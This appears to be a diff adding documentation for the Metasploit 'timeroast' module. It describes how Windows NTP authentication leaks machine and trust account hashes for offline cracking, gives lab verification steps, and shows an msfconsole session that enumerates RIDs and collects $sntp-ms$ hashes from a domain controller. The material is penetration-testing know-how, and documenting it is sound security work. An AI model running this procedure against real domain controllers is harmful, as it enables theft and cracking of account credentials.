|
| 1 | +## Vulnerable Application |
| 2 | +Windows authenticates NTP requests by calculating the message digest using the NT hash followed by the first |
| 3 | +48 bytes of the NTP message (all fields preceding the key ID). An attacker can abuse this to recover hashes |
| 4 | +that can be cracked offline for machine and trust accounts. The attacker must know the accounts RID, but |
| 5 | +because RIDs are sequential, they can easily be enumerated. |
| 6 | + |
| 7 | +## Verification Steps |
| 8 | + |
| 9 | +1. Setup a Windows domain controller target |
| 10 | +1. Start msfconsole |
| 11 | +1. Use the `auxiliary/admin/dcerpc/samr_account` module to create a new computer account with the `ADD_COMPUTER` action |
| 12 | + 1. Note the RID (the last part of the SID) and password of the new account |
| 13 | +1. Use the `auxiliary/scanner/ntp/timeroast` module |
| 14 | +1. Set the `RHOSTS` option to the target domain controller |
| 15 | +1. Set the `RIDS` option to the RID of the new account |
| 16 | +1. Run the module and see that a hash is collected, this has will show up in the output of the `creds` command if a |
| 17 | + database is connected |
| 18 | + |
| 19 | +## Options |
| 20 | + |
| 21 | +### RIDS |
| 22 | +The RIDs to enumerate (e.g. 1000-2000). Multiple values and ranges can be specified using a comma as a separator. |
| 23 | + |
| 24 | +## Scenarios |
| 25 | + |
| 26 | +### Windows 2019 x64 Domain Controller |
| 27 | + |
| 28 | +``` |
| 29 | +msf6 auxiliary(scanner/ntp/timeroast) > set RIDS 4200-4205 |
| 30 | +RIDS => 4200-4205 |
| 31 | +msf6 auxiliary(scanner/ntp/timeroast) > set RHOSTS 192.168.159.10 |
| 32 | +RHOSTS => 192.168.159.10 |
| 33 | +msf6 auxiliary(scanner/ntp/timeroast) > run |
| 34 | +[*] Checking RID: 4200 |
| 35 | +[*] Checking RID: 4201 |
| 36 | +[+] Hash for RID: 4201 - 4201:$sntp-ms$74e3c4ac73afe868119ff98613888d48$1c0100e900000000000a2c704c4f434ceb0aaf8ac9813bd40000000000000000eb0aea216d99a558eb0aea216d99e010 |
| 37 | +[*] Checking RID: 4202 |
| 38 | +[+] Hash for RID: 4202 - 4202:$sntp-ms$e106388a43f6bbd5365e3a6f2dee741d$1c0100e900000000000a2c704c4f434ceb0aaf8ac78c5c9a0000000000000000eb0aea21bb83de46eb0aea21bb8442f0 |
| 39 | +[*] Checking RID: 4203 |
| 40 | +[*] Checking RID: 4204 |
| 41 | +[+] Hash for RID: 4204 - 4204:$sntp-ms$d0b1961cc3d57a1eaa40bfeeb9f30eb9$1c0100e900000000000a2c704c4f434ceb0aaf8ac653c2f50000000000000000eb0aea222a6c25c3eb0aea222a6c6a8c |
| 42 | +[*] Checking RID: 4205 |
| 43 | +[*] Waiting on 3 pending responses... |
| 44 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 45 | +[*] Auxiliary module execution completed |
| 46 | +msf6 auxiliary(scanner/ntp/timeroast) > |
| 47 | +``` |
0 commit comments